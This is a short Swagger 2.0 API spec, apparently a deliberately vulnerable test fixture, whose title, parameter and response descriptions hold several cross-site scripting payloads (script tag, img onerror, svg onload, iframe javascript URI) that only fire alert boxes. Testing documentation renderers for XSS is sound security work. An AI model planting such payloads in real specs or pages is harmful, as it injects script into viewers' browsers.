swagger: '2.0'
info:
  title: Vulnerable API Documentation
  description: |
    <script>alert('XSS Demo - Security Test')</script>
    <img src=x onerror=alert('XSS-Triggered')>
  version: 1.0.0
host: vulnerable.example.com
basePath: /v1
schemes:
  - http
produces:
  - application/json
paths:
  /test/{input}:
    get:
      parameters:
        - name: input
          in: path
          description: |
            <svg/onload=alert('XSS-Param')>
            <img src=1 onerror=alert(1)>
          required: true
          type: string
      responses:
        '200':
          description: |
            <iframe/src="javascript:alert('XSS-Response')">
securityDefinitions:
  basicAuth:
    type: basic
